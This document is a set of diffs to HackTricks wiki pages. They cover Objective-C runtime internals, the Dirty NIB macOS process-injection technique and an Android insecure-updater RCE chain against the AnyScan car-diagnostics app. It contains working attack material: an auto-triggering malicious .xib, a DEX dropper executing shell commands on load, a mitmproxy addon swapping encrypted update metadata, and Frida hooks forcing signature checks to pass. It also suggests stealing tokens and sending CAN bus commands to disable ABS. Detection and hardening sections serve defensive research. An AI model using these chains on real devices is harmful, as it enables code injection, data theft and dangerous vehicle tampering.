- [CVE-2024-3660 Keras Lambda deserialization RCE](https://nvd.nist.gov/vuln/detail/CVE-2024-3660)
- [CVE-2025-1550 Keras arbitrary module import (≤ 3.8)](https://nvd.nist.gov/vuln/detail/CVE-2025-1550)
- [huntr report arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e)
- [huntr report arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -4,9 +4,9 @@
## CFRuntimeClass
CF\* objects come from CoreFOundation, which provides more than 50 classes of objects like `CFString`, `CFNumber` or `CFAllocatior`.
CF* objects come from CoreFoundation, which provides more than 50 classes of objects like `CFString`, `CFNumber` or `CFAllocator`.
All these clases are instances of the class `CFRuntimeClass`, which when called it returns an index to the `__CFRuntimeClassTable`. The CFRuntimeClass is defined in [**CFRuntime.h**](https://opensource.apple.com/source/CF/CF-1153.18/CFRuntime.h.auto.html):
All these classes are instances of the class `CFRuntimeClass`, which when called it returns an index to the `__CFRuntimeClassTable`. The CFRuntimeClass is defined in [**CFRuntime.h**](https://opensource.apple.com/source/CF/CF-1153.18/CFRuntime.h.auto.html):
```objectivec
// Some comments were added to the original code
@ -59,36 +59,47 @@ typedef struct __CFRuntimeClass {
### Memory sections used
Most of the data used by ObjectiveC runtime will change during the execution, therefore it uses some sections from the **\_\_DATA** segment in memory:
Most of the data used by ObjectiveC runtime will change during execution, therefore it uses a number of sections from the MachO `__DATA` family of segments in memory. Historically these included:
- **`__objc_msgrefs`** (`message_ref_t`): Message references
- **`__objc_ivar`** (`ivar`): Instance variables
- **`__objc_data`** (`...`): Mutable data
- **`__objc_classrefs`** (`Class`): Class references
- **`__objc_superrefs`** (`Class`): Superclass references
- **`__objc_protorefs`** (`protocol_t *`): Protocol references
- **`__objc_selrefs`** (`SEL`): Selector references
- **`__objc_const`** (`...`): Class `r/o` data and other (hopefully) constant data
- **`__objc_imageinfo`** (`version, flags`): Used during image load: Version currently `0`; Flags specify preoptimized GC support, etc.
- **`__objc_protolist`** (`protocol_t *`): Protocol list
- **`__objc_nlcatlist`** (`category_t`): Pointer to Non-Lazy Categories defined in this binary
- **`__objc_catlist`** (`category_t`): Pointer to Categories defined in this binary
- **`__objc_nlclslist`** (`classref_t`): Pointer to Non-Lazy Objective-C classes defined in this binary
- **`__objc_classlist`** (`classref_t`): Pointers to all Objective-C classes defined in this binary
- `__objc_msgrefs` (`message_ref_t`): Message references
- `__objc_ivar` (`ivar`): Instance variables
- `__objc_data` (`...`): Mutable data
- `__objc_classrefs` (`Class`): Class references
- `__objc_superrefs` (`Class`): Superclass references
- `__objc_protorefs` (`protocol_t *`): Protocol references
- `__objc_selrefs` (`SEL`): Selector references
- `__objc_const` (`...`): Class r/o data and other (hopefully) constant data
- `__objc_imageinfo` (`version, flags`): Used during image load: Version currently `0`; Flags specify preoptimized GC support, etc.
- `__objc_protolist` (`protocol_t *`): Protocol list
- `__objc_nlcatlist` (`category_t`): Pointer to Non-Lazy Categories defined in this binary
- `__objc_catlist` (`category_t`): Pointer to Categories defined in this binary
- `__objc_nlclslist` (`classref_t`): Pointer to Non-Lazy ObjectiveC classes defined in this binary
- `__objc_classlist` (`classref_t`): Pointers to all ObjectiveC classes defined in this binary
It also uses a few sections in the **`__TEXT`** segment to store constan values of it's not possible to write in this section:
It also uses a few sections in the `__TEXT` segment to store constants:
- **`__objc_methname`** (C-String): Method names
- **`__objc_classname`** (C-String): Class names
- **`__objc_methtype`** (C-String): Method types
- `__objc_methname` (CString): Method names
- `__objc_classname` (CString): Class names
- `__objc_methtype` (CString): Method types
Modern macOS/iOS (especially on Apple Silicon) also place ObjectiveC/Swift metadata in:
- `__DATA_CONST`: immutable ObjectiveC metadata that can be shared readonly across processes (for example many `__objc_*` lists now live here).
- `__AUTH` / `__AUTH_CONST`: segments containing pointers that must be authenticated at load or usetime on arm64e (Pointer Authentication). You will also see `__auth_got` in `__AUTH_CONST` instead of the legacy `__la_symbol_ptr`/`__got` only. When instrumenting or hooking, remember to account for both `__got` and `__auth_got` entries in modern binaries.
For background on dyld preoptimization (e.g., selector uniquing and class/protocol precomputation) and why many of these sections are "already fixed up" when coming from the shared cache, check the Apple `objc-opt` sources and dyld shared cache notes. This affects where and how you can patch metadata at runtime.
{{#ref}}
../macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
{{#endref}}
### Type Encoding
Objective-c uses some mangling to encode selector and variable types of simple and complex types:
ObjectiveC uses mangling to encode selector and variable types of simple and complex types:
- Primitive types use their first letter of the type `i` for `int`, `c` for `char`, `l` for `long`... and uses the capital letter in case it's unsigned (`L` for `unsigned Long`).
- Other data types whose letters are used or are special, use other letters or symbols like `q` for `long long`, `b` for `bitfields`, `B` for `booleans`, `#` for `classes`, `@` for `id`, `*` for `char pointers` , `^` for generic `pointers` and `?` for `undefined`.
- Arrays, structures and unions use `[`, `{` and `(`
- Primitive types use their first letter of the type `i` for `int`, `c` for `char`, `l` for `long`... and use the capital letter in case it's unsigned (`L` for `unsigned long`).
- Other data types use other letters or symbols like `q` for `long long`, `b` for bitfields, `B` for booleans, `#` for classes, `@` for `id`, `*` for `char *`, `^` for generic pointers and `?` for undefined.
- Arrays, structures and unions use `[`, `{` and `(` respectively.
#### Example Method Declaration
@ -111,18 +122,18 @@ The complete type encoding for the method is:
#### Detailed Breakdown
1. **Return Type (`NSString *`)**: Encoded as `@` with length 24
2. **`self` (object instance)**: Encoded as `@`, at offset 0
3. **`_cmd` (selector)**: Encoded as `:`, at offset 8
4. **First argument (`char * input`)**: Encoded as `*`, at offset 16
5. **Second argument (`NSDictionary * options`)**: Encoded as `@`, at offset 20
6. **Third argument (`NSError ** error`)**: Encoded as `^@`, at offset 24
1. Return Type (`NSString *`): Encoded as `@` with length 24
2. `self` (object instance): Encoded as `@`, at offset 0
3. `_cmd` (selector): Encoded as `:`, at offset 8
4. First argument (`char * input`): Encoded as `*`, at offset 16
5. Second argument (`NSDictionary * options`): Encoded as `@`, at offset 20
6. Third argument (`NSError ** error`): Encoded as `^@`, at offset 24
**With the selector + the encoding you can reconstruct the method.**
With the selector + the encoding you can reconstruct the method.
### **Classes**
### Classes
Clases in Objective-C is a struct with properties, method pointers... It's possible to find the struct `objc_class` in the [**source code**](https://opensource.apple.com/source/objc4/objc4-756.2/runtime/objc-runtime-new.h.auto.html):
Classes in ObjectiveC are C structs with properties, method pointers, etc. It's possible to find the struct `objc_class` in the [**source code**](https://opensource.apple.com/source/objc4/objc4-756.2/runtime/objc-runtime-new.h.auto.html):
```objectivec
struct objc_class : objc_object {
@ -145,12 +156,126 @@ struct objc_class : objc_object {
[...]
```
This class use some bits of the isa field to indicate some information about the class.
This class uses some bits of the `isa` field to indicate information about the class.
Then, the struct has a pointer to the struct `class_ro_t` stored on disk which contains attributes of the class like its name, base methods, properties and instance variables.\
During runtime and additional structure `class_rw_t` is used containing pointers which can be altered such as methods, protocols, properties...
Then, the struct has a pointer to the struct `class_ro_t` stored on disk which contains attributes of the class like its name, base methods, properties and instance variables. During runtime an additional structure `class_rw_t` is used containing pointers which can be altered such as methods, protocols, properties.
{{#ref}}
../macos-basic-objective-c.md
{{#endref}}
---
## Modern object representations in memory (arm64e, tagged pointers, Swift)
### Nonpointer `isa` and Pointer Authentication (arm64e)
On Apple Silicon and recent runtimes the ObjectiveC `isa` is not always a raw class pointer. On arm64e it is a packed structure that may also carry a Pointer Authentication Code (PAC). Depending on the platform it may include fields like `nonpointer`, `has_assoc`, `weakly_referenced`, `extra_rc`, and the class pointer itself (shifted or signed). This means blindly dereferencing the first 8 bytes of an ObjectiveC object will not always yield a valid `Class` pointer.
Practical notes when debugging on arm64e:
- LLDB will usually strip PAC bits for you when printing ObjectiveC objects with `po`, but when working with raw pointers you may need to strip authentication manually:
```lldb
(lldb) expr -l objc++ -- #include <ptrauth.h>
(lldb) expr -l objc++ -- void *raw = ptrauth_strip((void*)0x000000016f123abc, ptrauth_key_asda);
(lldb) expr -l objc++ -O -- (Class)object_getClass((id)raw)
```
- Many function/data pointers in MachO will reside in `__AUTH`/`__AUTH_CONST` and require authentication before use. If you are interposing or rebinding (e.g., fishhookstyle), ensure you also handle `__auth_got` in addition to legacy `__got`.
For a deep dive into language/ABI guarantees and the `<ptrauth.h>` intrinsics available from Clang/LLVM, see the reference in the end of this page.
### Tagged pointer objects
Some Foundation classes avoid heap allocation by encoding the objects payload directly in the pointer value (tagged pointers). Detection differs by platform (e.g., the mostsignificant bit on arm64, leastsignificant on x86_64 macOS). Tagged objects dont have a regular `isa` stored in memory; the runtime resolves the class from the tag bits. When inspecting arbitrary `id` values:
- Use runtime APIs instead of poking the `isa` field: `object_getClass(obj)` / `[obj class]`.
- In LLDB, just `po (id)0xADDR` will print tagged pointer instances correctly because the runtime is consulted to resolve the class.
### Swift heap objects and metadata
Pure Swift classes are also objects with a header pointing to Swift metadata (not ObjectiveC `isa`). To introspect live Swift processes without modifying them you can use the Swift toolchains `swift-inspect`, which leverages the Remote Mirror library to read runtime metadata:
```bash
# Xcode toolchain (or Swift.org toolchain) provides swift-inspect
swift-inspect dump-raw-metadata <pid-or-name>
swift-inspect dump-arrays <pid-or-name>
# On Darwin additionally:
swift-inspect dump-concurrency <pid-or-name>
```
This is very useful to map Swift heap objects and protocol conformances when reversing mixed Swift/ObjC apps.
---
## Runtime inspection cheatsheet (LLDB / Frida)
### LLDB
- Print object or class from a raw pointer:
```lldb
(lldb) expr -l objc++ -O -- (id)0x0000000101234560
(lldb) expr -l objc++ -O -- (Class)object_getClass((id)0x0000000101234560)
```
- Inspect ObjectiveC class from a pointer to an object methods `self` in a breakpoint:
```lldb
(lldb) br se -n '-[NSFileManager fileExistsAtPath:]'
(lldb) r
... breakpoint hit ...
(lldb) po (id)$x0 # self
(lldb) expr -l objc++ -O -- (Class)object_getClass((id)$x0)
```
- Dump sections that carry ObjectiveC metadata (note: many are now in `__DATA_CONST` / `__AUTH_CONST`):
```lldb
(lldb) image dump section --section __DATA_CONST.__objc_classlist
(lldb) image dump section --section __DATA_CONST.__objc_selrefs
(lldb) image dump section --section __AUTH_CONST.__auth_got
```
- Read memory for a known class object to pivot to `class_ro_t` / `class_rw_t` when reversing method lists:
```lldb
(lldb) image lookup -r -n _OBJC_CLASS_$_NSFileManager
(lldb) memory read -fx -s8 0xADDRESS_OF_CLASS_OBJECT
```
### Frida (ObjectiveC and Swift)
Frida provides highlevel runtime bridges that are very handy to discover and instrument live objects without symbols:
- Enumerate classes and methods, resolve actual class names at runtime, and intercept ObjectiveC selectors:
```js
if (ObjC.available) {
// List a class' methods
console.log(ObjC.classes.NSFileManager.$ownMethods);
// Intercept and inspect arguments/return values
const impl = ObjC.classes.NSFileManager['- fileExistsAtPath:isDirectory:'].implementation;
Interceptor.attach(impl, {
onEnter(args) {
this.path = new ObjC.Object(args[2]).toString();
},
onLeave(retval) {
console.log('fileExistsAtPath:', this.path, '=>', retval);
}
});
}
```
- Swift bridge: enumerate Swift types and interact with Swift instances (requires recent Frida; very useful on Apple Silicon targets).
---
## References
- Clang/LLVM: Pointer Authentication and the `<ptrauth.h>` intrinsics (arm64e ABI). https://clang.llvm.org/docs/PointerAuthentication.html
- Apple objc runtime headers (tagged pointers, nonpointer `isa`, etc.) e.g., `objc-object.h`. https://opensource.apple.com/source/objc4/objc4-818.2/runtime/objc-object.h.auto.html
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -2,75 +2,151 @@
{{#include ../../../banners/hacktricks-training.md}}
**For further detail about the technique check the original post from:** [**https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/) and the following post by [**https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/**](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/)**.** Here is a summary:
Dirty NIB refers to abusing Interface Builder files (.xib/.nib) inside a signed macOS app bundle to execute attacker-controlled logic inside the target process, thereby inheriting its entitlements and TCC permissions. This technique was originally documented by xpn (MDSec) and later generalized and significantly expanded by Sector7, who also covered Apples mitigations in macOS 13 Ventura and macOS 14 Sonoma. For background and deep dives, see the references at the end.
### What are Nib files
> TL;DR
> • Before macOS 13 Ventura: replacing a bundles MainMenu.nib (or another nib loaded at startup) could reliably achieve process injection and often privilege escalation.
> • Since macOS 13 (Ventura) and improved in macOS 14 (Sonoma): firstlaunch deep verification, bundle protection, Launch Constraints, and the new TCC “App Management” permission largely prevent postlaunch nib tampering by unrelated apps. Attacks may still be feasible in niche cases (e.g., samedeveloper tooling modifying own apps, or terminals granted App Management/Full Disk Access by the user).
Nib (short for NeXT Interface Builder) files, part of Apple's development ecosystem, are intended for defining **UI elements** and their interactions in applications. They encompass serialized objects such as windows and buttons, and are loaded at runtime. Despite their ongoing usage, Apple now advocates for Storyboards for more comprehensive UI flow visualization.
The main Nib file is referenced in the value **`NSMainNibFile`** inside the `Info.plist` file of the application and is loaded by the function **`NSApplicationMain`** executed in the `main` function of the application.
## What are NIB/XIB files
### Dirty Nib Injection Process
Nib (short for NeXT Interface Builder) files are serialized UI object graphs used by AppKit apps. Modern Xcode stores editable XML .xib files which are compiled into .nib at build time. A typical app loads its main UI via `NSApplicationMain()` which reads the `NSMainNibFile` key from the apps Info.plist and instantiates the object graph at runtime.
#### Creating and Setting Up a NIB File
Key points that enable the attack:
- NIB loading instantiates arbitrary ObjectiveC classes without requiring them to conform to NSSecureCoding (Apples nib loader falls back to `init`/`initWithFrame:` when `initWithCoder:` is not available).
- Cocoa Bindings can be abused to call methods as nibs are instantiated, including chained calls that require no user interaction.
1. **Initial Setup**:
- Create a new NIB file using XCode.
- Add an Object to the interface, setting its class to `NSAppleScript`.
- Configure the initial `source` property via User Defined Runtime Attributes.
2. **Code Execution Gadget**:
- The setup facilitates running AppleScript on demand.
- Integrate a button to activate the `Apple Script` object, specifically triggering the `executeAndReturnError:` selector.
3. **Testing**:
- A simple Apple Script for testing purposes:
## Dirty NIB injection process (attacker view)
```bash
set theDialogText to "PWND"
display dialog theDialogText
```
The classic preVentura flow:
1) Create a malicious .xib
- Add an `NSAppleScript` object (or other “gadget” classes such as `NSTask`).
- Add an `NSTextField` whose title contains the payload (e.g., AppleScript or command arguments).
- Add one or more `NSMenuItem` objects wired via bindings to call methods on the target object.
- Test by running in the XCode debugger and clicking the button.
2) Autotrigger without user clicks
- Use bindings to set a menu items target/selector and then invoke the private `_corePerformAction` method so the action fires automatically when the nib loads. This removes the need for a user to click a button.
#### Targeting an Application (Example: Pages)
Minimal example of an autotrigger chain inside a .xib (abridged for clarity):
```xml
<objects>
<customObject id="A1" customClass="NSAppleScript"/>
<textField id="A2" title="display dialog \"PWND\""/>
<!-- Menu item that will call -initWithSource: on NSAppleScript with A2.title -->
<menuItem id="C1">
<connections>
<binding name="target" destination="A1"/>
<binding name="selector" keyPath="initWithSource:"/>
<binding name="Argument" destination="A2" keyPath="title"/>
</connections>
</menuItem>
<!-- Menu item that will call -executeAndReturnError: on NSAppleScript -->
<menuItem id="C2">
<connections>
<binding name="target" destination="A1"/>
<binding name="selector" keyPath="executeAndReturnError:"/>
</connections>
</menuItem>
<!-- Triggers that autopress the above menu items at load time -->
<menuItem id="T1"><connections><binding keyPath="_corePerformAction" destination="C1"/></connections></menuItem>
<menuItem id="T2"><connections><binding keyPath="_corePerformAction" destination="C2"/></connections></menuItem>
</objects>
```
This achieves arbitrary AppleScript execution in the target process upon nib load. Advanced chains can:
- Instantiate arbitrary AppKit classes (e.g., `NSTask`) and call zeroargument methods like `-launch`.
- Call arbitrary selectors with object arguments via the binding trick above.
- Load AppleScriptObjC.framework to bridge into ObjectiveC and even call selected C APIs.
- On older systems that still include Python.framework, bridge into Python and then use `ctypes` to call arbitrary C functions (Sector7s research).
1. **Preparation**:
- Copy the target app (e.g., Pages) into a separate directory (e.g., `/tmp/`).
- Initiate the app to sidestep Gatekeeper issues and cache it.
2. **Overwriting NIB File**:
- Replace an existing NIB file (e.g., About Panel NIB) with the crafted DirtyNIB file.
3. **Execution**:
- Trigger the execution by interacting with the app (e.g., selecting the `About` menu item).
3) Replace the apps nib
- Copy target.app to a writable location, replace e.g., `Contents/Resources/MainMenu.nib` with the malicious nib, and run target.app. PreVentura, after a onetime Gatekeeper assessment, subsequent launches only performed shallow signature checks, so nonexecutable resources (like .nib) werent revalidated.
#### Proof of Concept: Accessing User Data
Example AppleScript payload for a visible test:
```applescript
set theDialogText to "PWND"
display dialog theDialogText
```
- Modify the AppleScript to access and extract user data, such as photos, without user consent.
### Code Sample: Malicious .xib File
## Modern macOS protections (Ventura/Monterey/Sonoma/Sequoia)
- Access and review a [**sample of a malicious .xib file**](https://gist.github.com/xpn/16bfbe5a3f64fedfcc1822d0562636b4) that demonstrates executing arbitrary code.
Apple introduced several systemic mitigations that dramatically reduce the viability of Dirty NIB in modern macOS:
- Firstlaunch deep verification and bundle protection (macOS 13 Ventura)
- On first run of any app (quarantined or not), a deep signature check covers all bundle resources. Afterwards, the bundle becomes protected: only apps from the same developer (or explicitly allowed by the app) may modify its contents. Other apps require the new TCC “App Management” permission to write into another apps bundle.
- Launch Constraints (macOS 13 Ventura)
- System/Applebundled apps cant be copied elsewhere and launched; this kills the “copy to /tmp, patch, run” approach for OS apps.
- Improvements in macOS 14 Sonoma
- Apple hardened App Management and fixed known bypasses (e.g., CVE202340450) noted by Sector7. Python.framework was removed earlier (macOS 12.3), breaking some privilegeescalation chains.
- Gatekeeper/Quarantine changes
- For a broader discussion of Gatekeeper, provenance, and assessment changes that impacted this technique, see the page referenced below.
### Other Example
> Practical implication
> • On Ventura+ you generally cannot modify a thirdparty apps .nib unless your process has App Management or is signed by the same Team ID as the target (e.g., developer tooling).
> • Granting App Management or Full Disk Access to shells/terminals effectively reopens this attack surface for anything that can execute code inside that terminals context.
In the post [https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/) you can find tutorial on how to create a dirty nib.
### Addressing Launch Constraints
- Launch Constraints hinder app execution from unexpected locations (e.g., `/tmp`).
- It's possible to identify apps not protected by Launch Constraints and target them for NIB file injection.
Launch Constraints block running many Apple apps from nondefault locations beginning with Ventura. If you were relying on preVentura workflows like copying an Apple app to a temp directory, modifying `MainMenu.nib`, and launching it, expect that to fail on >= 13.0.
### Additional macOS Protections
From macOS Sonoma onwards, modifications inside App bundles are restricted. However, earlier methods involved:
## Enumerating targets and nibs (useful for research / legacy systems)
1. Copying the app to a different location (e.g., `/tmp/`).
2. Renaming directories within the app bundle to bypass initial protections.
3. After running the app to register with Gatekeeper, modifying the app bundle (e.g., replacing MainMenu.nib with Dirty.nib).
4. Renaming directories back and rerunning the app to execute the injected NIB file.
- Locate apps whose UI is nibdriven:
```bash
find /Applications -maxdepth 2 -name Info.plist -exec sh -c \
'for p; do if /usr/libexec/PlistBuddy -c "Print :NSMainNibFile" "$p" >/dev/null 2>&1; \
then echo "[+] $(dirname "$p") uses NSMainNibFile=$( /usr/libexec/PlistBuddy -c "Print :NSMainNibFile" "$p" )"; fi; done' sh {} +
```
- Find candidate nib resources inside a bundle:
```bash
find target.app -type f \( -name "*.nib" -o -name "*.xib" \) -print
```
- Validate code signatures deeply (will fail if you tampered with resources and didnt resign):
```bash
codesign --verify --deep --strict --verbose=4 target.app
```
**Note**: Recent macOS updates have mitigated this exploit by preventing file modifications within app bundles post Gatekeeper caching, rendering the exploit ineffective.
> Note: On modern macOS you will also be blocked by bundle protection/TCC when trying to write into another apps bundle without proper authorization.
## Detection and DFIR tips
- File integrity monitoring on bundle resources
- Watch for mtime/ctime changes to `Contents/Resources/*.nib` and other nonexecutable resources in installed apps.
- Unified logs and process behavior
- Monitor for unexpected AppleScript execution inside GUI apps and for processes loading AppleScriptObjC or Python.framework. Example:
```bash
log stream --info --predicate 'processImagePath CONTAINS[cd] ".app/Contents/MacOS/" AND (eventMessage CONTAINS[cd] "AppleScript" OR eventMessage CONTAINS[cd] "loadAppleScriptObjectiveCScripts")'
```
- Proactive assessments
- Periodically run `codesign --verify --deep` across critical apps to ensure resources remain intact.
- Privilege context
- Audit who/what has TCC “App Management” or Full Disk Access (especially terminals and management agents). Removing these from generalpurpose shells prevents trivially reenabling Dirty NIBstyle tampering.
## Defensive hardening (developers and defenders)
- Prefer programmatic UI or limit whats instantiated from nibs. Avoid including powerful classes (e.g., `NSTask`) in nib graphs and avoid bindings that indirectly invoke selectors on arbitrary objects.
- Adopt the hardened runtime with Library Validation (already standard for modern apps). While this doesnt stop nib injection by itself, it blocks easy native code loading and forces attackers into scriptingonly payloads.
- Do not request or depend on broad App Management permissions in generalpurpose tools. If MDM requires App Management, segregate that context from userdriven shells.
- Regularly verify your app bundles integrity and make your update mechanisms selfheal bundle resources.
## Related reading in HackTricks
Learn more about Gatekeeper, quarantine and provenance changes that affect this technique:
{{#ref}}
../macos-security-protections/macos-gatekeeper.md
{{#endref}}
## References
- xpn DirtyNIB (original writeup with Pages example): https://blog.xpnsec.com/dirtynib/
- Sector7 Bringing process injection into view(s): exploiting all macOS apps using nib files (April 5, 2024): https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -148,7 +148,8 @@ if (ptrace) {
}
```
See also: {{#ref}}
See also:
{{#ref}}
reversing-native-libraries.md
{{#endref}}
@ -178,9 +179,11 @@ apk-mitm app.apk
- Tool: https://github.com/shroudedcode/apk-mitm
- For network config CAtrust tricks (and Android 7+ user CA trust), see:
{{#ref}}
make-apk-accept-ca-certificate.md
{{#endref}}
{{#ref}}
install-burp-certificate.md
{{#endref}}
@ -224,4 +227,4 @@ apk-mitm app.apk
- [Apktool install guide](https://apktool.org/docs/install)
- [Magisk](https://github.com/topjohnwu/Magisk)
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -2,15 +2,50 @@
{{#include ../../banners/hacktricks-training.md}}
Many Android applications implement their **own “plugin” or “dynamic feature” update channels** instead of using the Google Play Store. When the implementation is insecure an attacker able to intercept the traffic can supply **arbitrary native code that will be loaded inside the app process**, leading to full Remote Code Execution (RCE) on the handset and in some cases on any external device controlled by the app (cars, IoT, medical devices …).
Many Android applications implement their own “plugin” or “dynamic feature” update channels instead of using the Google Play Store. When the implementation is insecure an attacker able to intercept or tamper with the update traffic can supply arbitrary native or Dalvik/ART code that will be loaded inside the app process, leading to full Remote Code Execution (RCE) on the handset and in some cases on any external device controlled by the app (cars, IoT, medical devices …).
This page summarises a realworld vulnerability chain found in the Xtool **AnyScan** automotive-diagnostics app (v4.40.11 → 4.40.40) and generalises the technique so you can audit other Android apps and weaponise the mis-configuration during a red-team engagement.
This page summarises a realworld vulnerability chain found in the Xtool AnyScan automotive-diagnostics app (v4.40.11 → 4.40.40) and generalises the technique so you can audit other Android apps and weaponise the mis-configuration during a red-team engagement.
---
## 0. Quick triage: does the app have an inapp updater?
Static hints to look for in JADX/apktool:
- Strings: "update", "plugin", "patch", "upgrade", "hotfix", "bundle", "feature", "asset", "zip".
- Network endpoints like `/update`, `/plugins`, `/getUpdateList`, `/GetUpdateListEx`.
- Crypto helpers near update paths (DES/AES/RC4; Base64; JSON/XML packs).
- Dynamic loaders: `System.load`, `System.loadLibrary`, `dlopen`, `DexClassLoader`, `PathClassLoader`.
- Unzip paths writing under app-internal or external storage, then immediately loading a `.so`/DEX.
Runtime hooks to confirm:
```js
// Frida: log native and dex loading
Java.perform(() => {
const Runtime = Java.use('java.lang.Runtime');
const SystemJ = Java.use('java.lang.System');
const DexClassLoader = Java.use('dalvik.system.DexClassLoader');
SystemJ.load.overload('java.lang.String').implementation = function(p) {
console.log('[System.load] ' + p); return this.load(p);
};
SystemJ.loadLibrary.overload('java.lang.String').implementation = function(n) {
console.log('[System.loadLibrary] ' + n); return this.loadLibrary(n);
};
Runtime.load.overload('java.lang.String').implementation = function(p){
console.log('[Runtime.load] ' + p); return this.load(p);
};
DexClassLoader.$init.implementation = function(dexPath, optDir, libPath, parent) {
console.log(`[DexClassLoader] dex=${dexPath} odex=${optDir} jni=${libPath}`);
return this.$init(dexPath, optDir, libPath, parent);
};
});
```
---
## 1. Identifying an Insecure TLS TrustManager
1. Decompile the APK with jadx / apktool and locate the networking stack (OkHttp, HttpUrlConnection, Retrofit…).
2. Look for a **custom `TrustManager`** or `HostnameVerifier` that blindly trusts every certificate:
2. Look for a custom `TrustManager` or `HostnameVerifier` that blindly trusts every certificate:
```java
public static TrustManager[] buildTrustManagers() {
@ -24,26 +59,37 @@ public static TrustManager[] buildTrustManagers() {
}
```
3. If present the application will accept **any TLS certificate** → you can run a transparent **MITM proxy** with a self-signed cert:
3. If present the application will accept any TLS certificate → you can run a transparent MITM proxy with a self-signed cert:
```bash
mitmproxy -p 8080 -s addon.py # see §4
iptables -t nat -A OUTPUT -p tcp --dport 443 -j REDIRECT --to-ports 8080 # on rooted device / emulator
```
If TLS pinning is enforced instead of unsafe trust-all logic, see:
{{#ref}}
android-anti-instrumentation-and-ssl-pinning-bypass.md
{{#endref}}
{{#ref}}
make-apk-accept-ca-certificate.md
{{#endref}}
---
## 2. Reverse-Engineering the Update Metadata
In the AnyScan case each app launch triggers an HTTPS GET to:
```
https://apigw.xtoolconnect.com/uhdsvc/UpgradeService.asmx/GetUpdateListEx
```
The response body is an **XML document** whose `<FileData>` nodes contain **Base64-encoded, DES-ECB encrypted** JSON describing every available plugin.
The response body is an XML document whose `<FileData>` nodes contain Base64-encoded, DES-ECB encrypted JSON describing each available plugin.
Typical hunting steps:
1. Locate the crypto routine (e.g. `RemoteServiceProxy`) and recover:
* algorithm (DES / AES / RC4 …)
* mode of operation (ECB / CBC / GCM …)
* hard-coded key / IV (often 56-bit DES keys or 128-bit AES keys in constants)
- algorithm (DES / AES / RC4 …)
- mode of operation (ECB / CBC / GCM …)
- hard-coded key / IV (commonly 56bit DES or 128bit AES constants)
2. Re-implement the function in Python to decrypt / encrypt the metadata:
```python
@ -61,8 +107,16 @@ def encrypt_metadata(plaintext: bytes) -> str:
return b64encode(cipher.encrypt(plaintext.ljust((len(plaintext)+7)//8*8, b"\x00"))).decode()
```
Notes seen in the wild (20232025):
- Metadata is often JSON-within-XML or protobuf; weak ciphers and static keys are common.
- Many updaters accept plain HTTP for the actual payload download even if metadata comes over HTTPS.
- Plugins frequently unzip to app-internal storage; some still use external storage or legacy `requestLegacyExternalStorage`, enabling cross-app tampering.
---
## 3. Craft a Malicious Plugin
### 3.1 Native library path (dlopen/System.load[Library])
1. Pick any legitimate plugin ZIP and replace the native library with your payload:
```c
@ -80,11 +134,38 @@ $ zip -r PWNED.zip libscan_x64.so assets/ meta.txt
```
2. Update the JSON metadata so that `"FileName" : "PWNED.zip"` and `"DownloadURL"` points to your HTTP server.
3. DES-encrypt + Base64-encode the modified JSON and copy it back inside the intercepted XML.
3. Reencrypt + Base64encode the modified JSON and copy it back inside the intercepted XML.
### 3.2 Dex-based plugin path (DexClassLoader)
Some apps download a JAR/APK and load code via `DexClassLoader`. Build a malicious DEX that triggers on load:
```java
// src/pwn/Dropper.java
package pwn;
public class Dropper {
static { // runs on class load
try {
Runtime.getRuntime().exec("sh -c 'id > /data/data/<pkg>/files/pwned' ");
} catch (Throwable t) {}
}
}
```
```bash
# Compile and package to a DEX jar
javac -source 1.8 -target 1.8 -d out/ src/pwn/Dropper.java
jar cf dropper.jar -C out/ .
d8 --output outdex/ dropper.jar
cd outdex && zip -r plugin.jar classes.dex # the updater will fetch this
```
If the target calls `Class.forName("pwn.Dropper")` your static initializer executes; otherwise, reflectively enumerate loaded classes with Frida and call an exported method.
---
## 4. Deliver the Payload with mitmproxy
`addon.py` example that *silently* swaps the original metadata:
`addon.py` example that silently swaps the original metadata:
```python
from mitmproxy import http
@ -99,37 +180,72 @@ def request(flow: http.HTTPFlow):
)
```
Run a simple web server to host the malicious ZIP:
Run a simple web server to host the malicious ZIP/JAR:
```bash
python3 -m http.server 8000 --directory ./payloads
```
When the victim launches the app it will:
* fetch our forged XML over the MITM channel;
* decrypt & parse it with the hard-coded DES key;
* download `PWNED.zip` → unzip inside private storage;
* `dlopen()` the included *libscan_x64.so*, instantly executing our code **with the apps permissions** (camera, GPS, Bluetooth, filesystem, …).
- fetch our forged XML over the MITM channel;
- decrypt & parse it with the hard-coded crypto;
- download `PWNED.zip` or `plugin.jar` → unzip inside private storage;
- load the included `.so` or DEX, instantly executing our code with the apps permissions (camera, GPS, Bluetooth, filesystem, …).
Because the plugin is cached on disk the backdoor **persists across reboots** and runs every time the user selects the related feature.
Because the plugin is cached on disk the backdoor persists across reboots and runs every time the user selects the related feature.
## 5. Post-Exploitation Ideas
---
## 4.1 Bypassing signature/hash checks (when present)
* Steal session cookies, OAuth tokens, or JWTs stored by the app.
* Drop a second-stage APK and silently install it via `pm install` (the app already has `REQUEST_INSTALL_PACKAGES`).
* Abuse any connected hardware in the AnyScan scenario you can send arbitrary **OBD-II / CAN bus commands** (unlock doors, disable ABS, etc.).
If the updater validates signatures or hashes, hook verification to always accept attacker content:
```js
// Frida make java.security.Signature.verify() return true
Java.perform(() => {
const Sig = Java.use('java.security.Signature');
Sig.verify.overload('[B').implementation = function(a) { return true; };
});
// Less surgical (use only if needed): defeat Arrays.equals() for byte[]
Java.perform(() => {
const Arrays = Java.use('java.util.Arrays');
Arrays.equals.overload('[B', '[B').implementation = function(a, b) { return true; };
});
```
